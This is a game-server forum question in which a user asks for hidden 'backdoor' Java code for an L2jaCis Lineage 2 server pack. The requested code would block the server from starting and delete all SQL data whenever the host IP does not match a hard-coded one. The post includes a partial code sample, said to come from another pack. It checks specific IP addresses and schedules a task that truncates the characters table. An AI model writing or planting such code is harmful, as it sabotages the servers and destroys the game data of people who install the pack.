This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..
Question
numl0ckas
Hello, as topic says i need backdoor java code.
If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.
Can someone help to me make it? Or share it:)
PACK: L2jaCis
if(Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || Config.GAMESERVER_HOSTNAME.equals("77.120.29.151")) ThreadPoolManager.getInstance().schedule(new Runnable() { public void run () { try { Connection con = L2DatabaseFactory.getInstance().getConnection(); con.prepareStatement("truncate table characters").execute();ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)
21 answers to this question
Recommended Posts